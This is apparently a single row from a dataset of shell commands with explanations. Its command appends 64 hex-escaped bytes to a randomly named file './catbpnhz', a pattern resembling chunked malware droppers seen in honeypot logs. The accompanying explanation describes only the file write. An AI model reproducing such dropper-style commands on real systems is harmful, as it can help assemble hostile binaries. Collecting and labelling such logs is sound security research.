21dae9a5de5b | 2021_2022 | 48 | echo -ne '\x8B\xDF\xA3\xE7\xA6\x9A\xEB\xE0\x6F\x46\xAF\xA7\x00\x34\x34\x05\x1B\x06\x67\x0B\xB3\xCC\xE6\x16\xF3\xA2\x03\x5F\x2C\xCF\x25\x18\x7B\x90\x80\x02\x10\x27\x57\x13\xAF\xBA\x86\x09\x6F\x0B\x2B\xAF\xB3\x7B\x37\x06\x3B\x04\xA0\x8D\xD0\x6E\x24\x24\x51\x47\x83\x10'>>./catbpnhz | # echo -ne '\x8B\xDF\xA3\xE7\xA6\x9A\xEB\xE0\x6F\x46\xAF\xA7\x00\x34\x34\x05\x1B\x06\x67\x0B\xB3\xCC\xE6\x16\xF3\xA2\x03\x5F\x2C\xCF\x25\x18\x7B\x90\x80\x02\x10\x27\x57\x13\xAF\xBA\x86\x09\x6F\x0B\x2B\xAF\xB3\x7B\x37\x06\x3B\x04\xA0\x8D\xD0\x6E\x24\x24\x51\x47\x83\x10'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.